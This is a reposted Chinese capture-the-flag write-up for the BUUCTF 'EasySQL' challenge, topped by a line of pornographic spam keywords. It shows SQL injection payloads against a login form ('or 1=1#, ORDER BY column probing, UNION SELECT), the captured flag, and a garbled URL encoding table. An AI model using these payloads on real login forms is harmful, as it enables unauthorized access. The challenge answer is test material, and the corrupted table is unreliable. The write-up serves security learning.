日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)

發布時間:2025/3/15 46 豆豆
生活随笔 收集整理的這篇文章主要介紹了 BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

點擊鏈接進入環境發現是一個登錄界面
我的思路:
第一步、測試注入點(tips:利用單引號,and 1=1, or 1=1之類的,%23為#注釋符的url編碼)判斷是字符型還是數字型

payload:username=1' &password=123(SQL tyntax)

payload:username=1' %23&password=123(說明存在注入點)


第二步、利用order by查表的列數

payload:username=1' order by 1%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 2%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 4%23&password=123(Unknown column '4' in 'order clause')
說明表只有四列

第三步、如有回顯,找到回顯位(回顯,就是顯示正在執行的批處理命令及執行的結果等)
?

payload:username=1' union select 1,2,3%23&password=123

flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
發現在查找回顯位的這一步就出現了flag,都用不到爆庫

第四步、利用union select 爆庫、爆表、爆字段名、爆值
?

看大佬wp發現還有一種更簡單的方法:

實際上這道題是登錄成功就可以拿到flag
在用戶名和密碼都填:
payload:'or 1=1#
由于用戶名和密碼都存在sql注入漏洞,可以用'閉合前面的查詢語句同時用or繞過判斷

?

?

★URL編碼表:

backspace8%A41%a61%§%A7?%D5?
tab9%B42%b62%?%AB?%D6?
linefeed%0AC43%c63%?%AC?%D8?
creturn%0DD44%d64%ˉ%ADù%D9?
space20%E45%e65%o%B0ú%DA?
!21%F46%f66%±%B1?%DB?
"22%G47%g67%a%B2ü%DC?
#23%H48%h68%,%B4Y%DD?
$24%I49%i69%μ%B5T%DE?
%25%J%4Aj%6A?%BB?%DF?
&26%K%4Bk%6B?%BCà%E0?
'27%L%4Cl%6C?%BDá%E1?
(28%M%4Dm%6D?%BFa%E2?
)29%N%4En%6Eà%C0?%E3?
*%2AO%4Fo%6Fá%C1?%E4?
+%2BP50%p70%?%C2?%E5?
,%2CQ51%q71%?%C3?%E6?
-%2DR52%r72%?%C4?%E7?
.%2ES53%s73%?%C5è%E8?
/%2FT54%t74%?%C6é%E9?
030%U55%u75%?%C7ê%EA?
131%V56%v76%è%C8?%EB?
232%W57%w77%é%C9ì%EC?
333%X58%x78%ê%CAí%ED?
434%Y59%y79%?%CB?%EE?
535%Z%5Az%7Aì%CC?%EF?
636%??????e%F0?
737%?%3F{%7Bí%CD?%F1?
838%@40%|%7C?%CEò%F2?
939%[%5B}%7D?%CFó%F3?
:%3A\%5C~%7ED%D0?%F4?
;%3B]%5D%A2?%D1?%F5?
<?%3C^%5E%A3ò%D2?%F6?
=%3D_%5F%A5ó%D3÷%F7?
>?%3E`60%|%A6?%D4?%F8?
????????ù%F9?

?

?

?

?

總結

以上是生活随笔為你收集整理的BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。